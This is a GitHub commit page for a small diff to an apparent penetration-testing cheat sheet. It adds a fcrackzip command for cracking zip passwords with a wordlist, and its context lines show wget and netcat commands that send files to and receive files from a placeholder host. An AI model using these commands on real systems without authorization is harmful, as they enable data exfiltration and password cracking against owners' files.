Update Cheat Sheet.md

This commit is contained in:
AbdullahRizwan101 2020-11-03 11:32:12 -05:00 committed by GitHub
parent 47382dfcf4
commit 6f53f6a000
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -56,6 +56,10 @@ wget http://<ip>:port/<file>
`nc -l -p [port] > file` Receive file <br/>
`nc -w 3 [ip] [port] < file `Send file <br/>
### Cracaking Zip Archive
* `fcrackzip -u -D -p <path_to_wordlist> <archive.zip>`
# Windows
### Adding User